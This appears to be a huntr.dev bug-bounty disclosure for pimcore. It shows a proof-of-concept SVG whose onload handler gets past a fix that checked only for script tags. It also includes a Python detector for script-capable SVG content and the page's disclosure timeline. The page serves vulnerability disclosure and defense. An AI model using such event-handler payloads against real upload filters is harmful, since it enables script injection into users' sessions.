Exposure of Sensitive Information to an Unauthorized Actor in pimcore/pimcore

Valid

Reported on

Jan 20th 2022


Description

XSS

Proof of Concept

Previous bug https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6/ is not properly fixed. It can be bypassed using an event handler. https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911 is only checking for the <script tag, which will be bypassed using the onload event handler.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
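The gap the report describes, shown as an added check (illustrative Python, not pimcore's code): a string match for "<script" passes the reporter's SVG, while a parser-based check that also rejects on* event-handler attributes catches it. Both sample documents are constructed from the SVG above; the stricter check goes beyond this page's single case by also flagging foreignObject elements and javascript: hrefs.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample 1: the reporter's SVG from this page (onload handler, no <script> element).
SVG_ONLOAD = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>"""

# Constructed sample 2: the same drawing with no active content at all.
SVG_BENIGN = """<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>"""

EVENT_ATTR = re.compile(r"^on[a-z]+$")  # onload, onclick, onerror, ...


def naive_check(svg: str) -> bool:
    """The pattern the report describes: the file is treated as safe unless a <script tag appears."""
    return "<script" not in svg.lower()


def find_active_content(svg: str) -> list[str]:
    """Parse the SVG as XML and list every element or attribute that can run script.

    Covers <script>/<foreignObject> elements, on* event-handler attributes and
    javascript: URLs in href / xlink:href, so the onload bypass is caught too.
    """
    try:
        root = ET.fromstring(svg.encode("utf-8"))
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1].lower()  # drop the namespace prefix
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for name, value in elem.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()  # xlink:href -> href
            if EVENT_ATTR.match(attr):
                findings.append(f"{attr} event handler on <{tag}>")
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in {attr} on <{tag}>")
    return findings


def is_safe_svg(svg: str) -> bool:
    """Upload gate: accept only when the parsed document carries no active content."""
    return find_active_content(svg) == []
```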
We are processing your report and will contact the pimcore team within 24 hours. 5 months ago
We have contacted a member of the pimcore team and are waiting to hear back 5 months ago
We have sent a follow up to the pimcore team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the pimcore team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the pimcore team. This report is now considered stale. 5 months ago
JiaJia Ji validated this vulnerability 5 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
JiaJia Ji confirmed that a fix has been merged on 7697f7 5 months ago
JiaJia Ji has been awarded the fix bounty